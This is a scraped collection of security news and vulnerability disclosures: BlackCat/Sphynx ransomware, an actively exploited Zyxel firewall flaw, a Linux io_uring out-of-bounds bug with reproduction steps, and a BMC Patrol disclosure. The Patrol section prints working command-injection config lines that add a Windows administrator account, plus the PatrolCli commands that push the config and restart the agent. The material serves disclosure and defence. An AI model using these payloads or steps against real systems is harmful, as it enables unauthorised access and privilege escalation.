The threat actors behind BlackCat ransomware have come up with an improved variant that prioritizes speed and stealth in an attempt to bypass security guardrails and achieve their goals.

The new version, dubbed **Sphynx** and announced in February 2023, packs a "number of updated capabilities that strengthen the group's efforts to evade detection," IBM Security X-Force said in a new analysis.

The "product" update was first highlighted by vx-underground in April 2023. Trend Micro, last month, detailed a Linux version of Sphynx that's "focused primarily on its encryption routine."

BlackCat, also called ALPHV and Noberus, is the first Rust-language-based ransomware strain spotted in the wild. Active since November 2021, it has emerged as a formidable ransomware actor, victimizing more than 350 targets as of May 2023.

The group, like other ransomware-as-a-service (RaaS) offerings, is known to operate a double extortion scheme, deploying custom data exfiltration tools like ExMatter to siphon sensitive data prior to encryption.

Initial access to targeted networks is typically obtained through a network of actors called initial access brokers (IABs), who employ off-the-shelf information stealer malware to harvest legitimate credentials.

BlackCat has also been observed to share overlaps with the now-defunct BlackMatter ransomware family, according to Cisco Talos and Kaspersky.

The findings provide a window into the ever-evolving cybercrime ecosystem wherein threat actors enhance their tooling and tradecraft to increase the likelihood of a successful compromise, not to mention thwart detection and evade analysis.

Specifically, the Sphynx version of BlackCat incorporates junk code and encrypted strings, while also reworking the command line arguments passed to the binary.

Sphynx also incorporates a loader to decrypt the ransomware payload that, upon execution, performs network discovery activities to hunt for additional systems, deletes volume shadow copies, encrypts files, and finally drops the ransom note.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

Despite law enforcement campaigns against cybercrime and ransomware groups, the continuous shift in tactics is proof that BlackCat remains an active threat to organizations and has "no signs of winding down."

Source: WithSecure

Finnish cybersecurity firm WithSecure, in a recent research, described how the illicit financial proceeds associated with ransomware attacks have led to a "professionalization of cyber crime" and the advent of new supporting underground services.

"Many major ransomware groups are operating a service provider or RaaS model, where they supply tooling and expertise to affiliates, and in return take a cut of the profits," the company said.

"These profits have driven the rapid development of a service industry, providing all the tools and services that an up and coming threat group could need, and thanks to cryptocurrency and dark web routing services the many different groups involved are able to anonymously buy and sell services, and access their profits."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Improved BlackCat Ransomware Strikes with Lightning Speed and Stealthy Tactics

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a recently patched critical security flaw in Zyxel gear to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
Tracked as CVE-2023-28771 (CVSS score: 9.8), the issue relates to a command injection flaw impacting different firewall models that could enable an unauthenticated attacker

Network Security / Exploit

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a recently patched critical security flaw in Zyxel gear to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.

Tracked as CVE-2023-28771 (CVSS score: 9.8), the issue relates to a command injection flaw impacting different firewall models that could enable an unauthenticated attacker to execute arbitrary code by sending a specially crafted packet to the device.

Zyxel addressed the security defect as part of updates released on April 25, 2023. The list of impacted devices is below -

*   ATP (versions ZLD V4.60 to V5.35, patched in ZLD V5.36)
*   USG FLEX (versions ZLD V4.60 to V5.35, patched in ZLD V5.36)
*   VPN (versions ZLD V4.60 to V5.35, patched in ZLD V5.36), and
*   ZyWALL/USG (versions ZLD V4.60 to V4.73, patched in ZLD V4.73 Patch 1)

The Shadowserver Foundation, in a recent tweet, said the flaw is "being actively exploited to build a Mirai-like botnet" since May 26, 2023. Cybersecurity firm Rapid7 has also warned of "widespread" in-the-wild abuse of CVE-2023-28771.

In light of this development, it's imperative that users move quickly to apply the patches to mitigate potential risks. Federal agencies in the U.S. are mandated to update their devices by June 21, 2023.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

The disclosure also comes as Palo Alto Networks Unit 42 detailed a new wave of attacks mounted by an active Mirai botnet variant dubbed IZ1H9 since early April 2023.

The intrusions have been found to leverage multiple remote code execution flaws in internet-exposed IoT devices, including Zyxel, to ensnare them into a network for orchestrating distributed denial-of-service (DDoS) attacks.

It's worth noting that Mirai has spawned a number of clones since its source code was leaked in October 2016.

"IoT devices have always been a lucrative target for threat actors, and remote code execution attacks continue to be the most common and most concerning threats affecting IoT devices and linux servers," Unit 42 said.

"The vulnerabilities used by this threat are less complex, but this does not decrease their impact, since they could still lead to remote code execution."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Active Mirai Botnet Variant Exploiting Zyxel Devices for DDoS Attacks

A flaw was found in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) in the Linux kernel that allows out-of-bounds access to physical memory beyond the end of the buffer. This flaw enables full local privilege escalation.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Mon, 8 May 2023 16:01:59 +0200
From: Tobias Holl <tobias@...ll.xyz>
To: oss-security@...ts.openwall.com
Subject: Linux kernel io\_uring out-of-bounds access to physical memory

Hi all,

a bug in the fixed buffer registration code for io\_uring
(io\_sqe\_buffer\_register in io\_uring/rsrc.c) allows out-of-bounds access
to physical memory beyond the end of the buffer. This can be used to
achieve full local privilege escalation.

The vulnerable code landed in 6.3-rc1 with commit 57bebf807e2a
("io\_uring/rsrc: optimise registered huge pages")¹.

A fix has been committed upstream for 6.4-rc1 in commit 776617db78c6
("io\_uring/rsrc: check for nonconsecutive pages")². The fix has also
been staged³ for 6.3.2.

CVE assignment for this issue is pending.


The idea behind the original commit is that instead of splitting huge
pages that are registered as a buffer into individual bvec entries
(expensive), we can just have a single bvec entry for all parts of the
huge page that are in the buffer (not expensive). Specifically, if all
pages in the buffer map to the same folio, it will use the first struct
page and the length of the buffer in a single bvec entry rather than
mapping each page individually.

For a normal huge page, this works. Unfortunately, this misses the fact
that just because the pages map to the same folio, they do not
necessarily have to be consecutive. In fact, they can all be the \_same\_
page of memory (e.g. by repeatedly mapping at offset 0 from a memfd).
Then, the bvec will span far beyond the single page that it is actually
allowed to touch. Later, IORING\_OP\_READ\_FIXED and IORING\_OP\_WRITE\_FIXED
allow us to read from and write to the buffer (i.e. the memory pointed
to by the bvec) at will. This allows read/write access to the physical
memory behind the single page that we actually have.

The actual length of the buffer (and therefore the limit of our OOB
access) is only limited by the number of pages we can map (generally
close to vm.max\_map\_count, since each mapping of the same page requires
a new mapping). If hugetlbfs is enabled and huge pages are set up, you
can use them to access even more memory, but this isn't generally
required in order to find something interesting in the accessible
memory.


TL;DR bug reproduction steps:
  1. Create a memfd
  2. fallocate a single page in that file descriptor
  3. Use MAP\_FIXED to map this page repeatedly, in consecutive locations
  4. Register the entire region that you just filled up with that page as
     a fixed buffer with IORING\_REGISTER\_BUFFERS
  5. Use IORING\_OP\_WRITE\_FIXED to write the buffer to some other file
     (OOB read) or IORING\_OP\_READ\_FIXED to read data into the buffer (OOB
     write).

Of course, from there, we can simply find any interesting object in
physical memory and start overwriting function pointers to get code
execution and escalate privileges. A full proof-of-concept exploit with
a bit more robustness can be found at
   https://tholl.xyz/static/bugs/2023-io\_uring-fixed-buffers/exploit.c

-- Tobias


¹ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=57bebf807e2abcf87d96b9de1266104ee2d8fc2f
² https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=776617db78c6d208780e7c69d4d68d1fa82913de
³ Commit 14ad317320c7c000e89ee5a928b9ca165443af0e for 6.3.2-rc1,
   https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable-rc.git/commit/?h=linux-6.3.y&id=14ad317320c7c000e89ee5a928b9ca165443af0e

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2023-2598: security - Linux kernel io_uring out-of-bounds access to physical memory

A use after free flaw was found in hfsplus_put_super in fs/hfsplus/super.c in the Linux Kernel. This flaw could allow a local user to cause a denial of service problem.

CVE-2023-2985

** DISPUTED ** An issue was discovered in BMC Patrol through 23.1.00. The agent's configuration can be remotely modified (and, by default, authentication is not required). Some configuration fields related to SNMP (e.g., masterAgentName or masterAgentStartLine) result in code execution when the agent is restarted. NOTE: the vendor's perspective is "These are not vulnerabilities for us as we have provided the option to implement the authentication."

*   Remote secrets leak using Patrol’s pconfig (<22.1.00)
*   Remote code excution using Patrol’s pconfig
*   Editor response
*   Timeline

Patrol’s default configuration permits unauthenticated remote configuration access and modification: 

If your organisation uses this default setting, it should be changed ASAP as this makes the agent subject to two unauthenticated vulnerabilities resulting in remote code execution.

**Remote secrets leak using Patrol’s pconfig (<22.1.00)**

The configuration is remotely queried using the pconfig binary. The configuration contains the encrypted password of the local Patrol user: 

All Patrol instances before update 22.1.00 use a default encryption key.

Thus the password of the Patrol account can be decrypted: 

A valid Patrol account can be used to authenticate to the service and remotely execute code: 

This vulnerability is mitigated in versions >=22.1.00 since the encryption key has been diversified.

**Remote code excution using Patrol’s pconfig**

The agent’s configuration can be remotely updated using the pconfig binary.

Remote code execution can be achieved by injecting commands in the masterAgentName field that is used to start the SNMP service.

For Windows:

    "/snmp/masterAgentName" = { REPLACE = "cmd /c \"net user test_lol sup3rPASS! /add && net localgroup Administrators test_lol /add\" &&" },
    "/snmp/masterAgentDir" = { REPLACE="bin/../../../Windows/system32/" },
    

Do note that the masterAgentDir path is relative and depends on Patrol’s installation path. Usually this is under C:\\BMC.

On Linux systems (according to my old notes, YMMV) it’s a different parameter that leads to code execution:

    "/snmp/masterAgentStartLine" = { REPLACE="/usr/bin/touch /tmp/snmp ; /usr/bin/touch /tmp/snmp2 & #" },
    

The configuration is pushed using the +Reload directive:

    PatrolCli -host xxx +Reload /tmp/my_config
    

To maximize chances of success, only the new SNMP configuration should be pushed. Remotely overwriting other parts of the configuration may result in an **unrecoverable** remote DoS.

The agent needs to be remotely restarted for the modification to take effect:

    PatrolCli -host xxx +RESTART
    

**Editor response**

According to the editor these are not vulnerabilities: “These are not vulnerabilities for us as we have provided the option to implement the authentication”.

**Timeline**

2021: Vulnerabilities discovered  
2023-01: Editor contacted  
2023-02: Editor ACK  
2023-05: FD

CVE-2023-34257: Vulnerabilities in BMC Patrol’s agent remote configuration

An issue was discovered in the Linux kernel through 6.3.5. There is a use-after-free in xfs_btree_lookup_get_block in fs/xfs/libxfs/xfs_btree.c because fs/xfs/xfs_buf_item_recover.c does not perform buffer content verification when log replay is skipped.

Tag

#linux